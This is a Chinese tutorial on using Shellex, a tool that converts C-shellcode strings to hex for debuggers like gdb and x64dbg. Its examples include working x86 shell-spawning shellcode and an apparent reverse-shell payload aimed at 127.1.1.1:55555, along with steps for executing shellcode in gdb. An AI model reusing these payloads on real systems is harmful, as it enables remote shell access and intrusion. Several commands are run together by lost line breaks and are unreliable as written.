Shellex怎么用

这篇文章给大家分享的是有关Shellex怎么用的内容。小编觉得挺实用的，因此分享给大家做个参考，一起跟随小编过来看看吧。

Shellex

Shellex是一款功能强大的C-shellcode转换器，可以帮助广大研究人员将C-shellcode转换为十六进制代码，并且能够在gdb、windbg、radare2、ollydbg、x64dbg、immunity调试器和010编辑器中粘贴和执行shellcode。

在Shellex的帮助下，广大研究人员可以将C-shellcode代码转换为十六进制代码，并且还可以在C编译器中编译时进行转换，整个过程只需要执行Shellex，并将shellcode代码拷贝进去并按下回车键即可。

比如说，我们可以转换多行混合了ASCII代码的C-shellcode（注意混合部分\x68//sh\x68/bin\x89）：

"\x6a\x17\x58\x31\xdb\xcd\x80""\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80"

Shellex输出如下：

6A 17 58 31 DB CD 80 6A 0B 58 99 52 68 2F 2F 73 68 68 2F 62 69 6E 89 E3 52 53 89 E1 CD 80

转换包含注释代码的C-shellcode：

"\x68""\x7f\x01\x01\x01"  // <- IP:  127.1.1.1"\x5e\x66\x68""\xd9\x03"          // <- Port: 55555"\x5f\x6a\x66\x58\x99\x6a\x01\x5b\x52\x53\x6a\x02""\x89\xe1\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79""\xf9\xb0\x66\x56\x66\x57\x66\x6a\x02\x89\xe1\x6a""\x10\x51\x53\x89\xe1\xcd\x80\xb0\x0b\x52\x68\x2f""\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53""\xeb\xce"

Shellex输出如下：

68 7F 01 01 01 5E 66 68 D9 03 5F 6A 66 58 99 6A 01 5B 52 53 6A 02 89 E1 CD 80 93 59 B0 3F CD 80 49 79 F9 B0 66 56 66 57 66 6A 02 89 E1 6A 10 51 53 89 E1 CD 80 B0 0B 52 68 2F 2F 73 68 68 2F 62 69 6E 89 E3 52 53 EB CE

如果你需要Shellex输出新的C-shellcode字符串，可以使用-h参数，比如说：

./shellex -h 6A 17 58 31 DB CD 80 6A 0B 58 99 52 68 2F 2F 73 68 68 2F 62 69 6E 89 E3 52 53 89 E1 CD 80 \x6A\x17\x58\x31\xDB\xCD\x80\x6A\x0B\x58\x99\x52\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x52\x53\x89\xE1\xCD\x80

Shellex安装

首先，广大研究人员需要使用下列代码将该项目源码克隆至本地：

git clone https://github.com/David-Reguera-Garcia-Dreg/shellex.git

针对Windows：

shellex\bins\shellex.exe

针对Linux：

sudo apt-get install tccshellex/linuxbins/shellex

在gdb中复制和执行shellcode

首先，我们需要运行Shellex。

接下来，输入我们的shellcode：

"\x6a\x17\x58\x31\xdb\xcd\x80""\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80"

按下回车键后，再按下Control+D键。

使用shellex -h命令将Shellex输出转换为C-Hex字符串：

shellex -h 6A 17 58 31 DB CD 80 6A 0B 58 99 52 68 2F 2F 73 68 68 2F 62 69 6E 89 E3 52 53 89 E1 CD 80

将C-Hex字符串以源码形式（包含"echo"命令）写入至文件：

echo -ne "\x6A\x17\x58\x31\xDB\xCD\x80\x6A\x0B\x58\x99\x52\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x52\x53\x89\xE1\xCD\x80" > /tmp/sc

接下来，将源码文件写入当前指令指针。

32位：

restore /tmp/sc binary $eipx/30b $eipx/15i $eip

64位：

restore /tmp/sc binary $ripx/30b $ripx/15i $rip

x/30b是shellcode的字节大小，我们可以使用下列命令获取到大小值：

wc -c /tmp/sc

x/15i是显示的指令数量，我们可以使用ndisasm获取正确的数量：

sudo apt-get install nasm

32位：

ndisasm -b32 /tmp/scndisasm -b32 /tmp/sc | wc -l

64位：

ndisasm -b64 /tmp/scndisasm -b64 /tmp/sc | wc -l

无交互模式

在Linux中转换"\x6a\x17\x58\x31\xdb\xcd\x80"：

echo "\"\\x6a\\x17\\x58\\x31\\xdb\\xcd\\x80\"" | shellex

在Windows中转换"\x6a\x17\x58\x31\xdb\xcd\x80"：

echo "\x6a\x17\x58\x31\xdb\xcd\x80" | shellex.exe

Windows下写入多行文件：

C:\Users\Dreg\Desktop\shellex\bins>type sc.txt"\x6a\x17\x58\x31\xdb\xcd\x80""\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80"C:\Users\Dreg\Desktop\shellex\bins>type sc.txt | shellex.exe

Linux下写入多行文件：

dreg@fr33project# cat sc.txt"\x6a\x17\x58\x31\xdb\xcd\x80""\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80"dreg@fr33project# cat sc.txt | shellex

感谢各位的阅读！关于"Shellex怎么用"这篇文章就分享到这里了，希望以上内容可以对大家有一定的帮助，让大家可以学到更多知识，如果觉得文章不错，可以把它分享出去让更多的人看到吧！